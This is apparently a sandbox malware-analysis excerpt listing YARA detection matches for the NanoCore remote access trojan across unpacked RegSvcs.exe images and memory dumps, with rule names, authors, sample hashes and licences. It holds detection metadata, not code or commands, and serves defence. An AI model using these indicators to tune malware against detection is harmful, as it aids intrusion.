Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
